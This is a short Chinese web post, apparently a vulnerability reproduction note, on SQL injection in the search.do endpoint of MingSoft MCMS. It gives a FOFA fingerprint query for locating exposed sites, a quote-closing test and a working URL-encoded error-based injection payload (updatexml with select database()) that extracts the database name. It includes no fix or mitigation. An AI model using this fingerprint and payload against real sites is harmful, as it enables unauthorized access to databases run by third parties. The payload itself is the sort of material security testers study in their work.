铭飞CMS是一款开源的内容管理系统,SQL注入漏洞存在于铭飞CMS的search接口处,当用户输入的内容未被充分过滤或转义时,攻击者可以在url中构造嵌入恶意的SQL语句,从而实现对数据库的操控
body=”铭飞MCMS” || body=”/mdiy/formData/save.do” || body=”static/plugins/ms/1.0.0/ms.js”
/mcms/search.do'%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)%20and%20'1 在fofa中搜索资产,共有1689条数据匹配
访问目标网站的/mcms/search.do页面
构造闭合参数/mcms/search.do’ and ‘1
使用报错注入获取目标网站当前数据库名称
原创文章,作者:优速盾-小U,如若转载,请注明出处:https://www.cdnb.net/bbs/archives/31257
一文搞懂cdn加速原理 一、什么是 CDN CDN的全称是(Content Delivery Network),即内容分发网络。其目的是通过在现有的Internet中…
台湾花莲县海域突发7.3级地震!多地震感强烈! 04月03日07时58分在台湾花莲县海域(北纬23.81度,东经121.74…
网站SEO优化,内容是基础。一个网站如果没有内容,谈再多的SEO优化技术都是空谈。网站内容可以是文字、图片或者是视频,但是我们知道,搜索引擎是比较喜欢图文结合的内容,所以,在这里建…
作为中国最大的互联网公司,百度一直在加强DNS服务器安全,近日百度推出了自己的公共DNS,面向所有普通上网用户,并且此服务是免费的。此外,百度公共DNS拥有和百度搜索一样的基础网络…
本文转自: 一、确定ip进入网址https://github.com.ipaddress.com 查看GitHub的ip地址。 140.82…
网站如何进行关键词seo优化布局?可以从以下几个方面进行考虑: 1、网站主导航、侧导航关键词seo优化布局 按照从上到下、从左到右的原则,…
随着互联网行业的发展,很多公司都开始做在线seo推广,一些公司也会利用seo优化来引流网站流量,从而促进销售增长。 然而,搜索引擎算法的调整,导致很多行业的网站排名竞争日趋激烈。 …
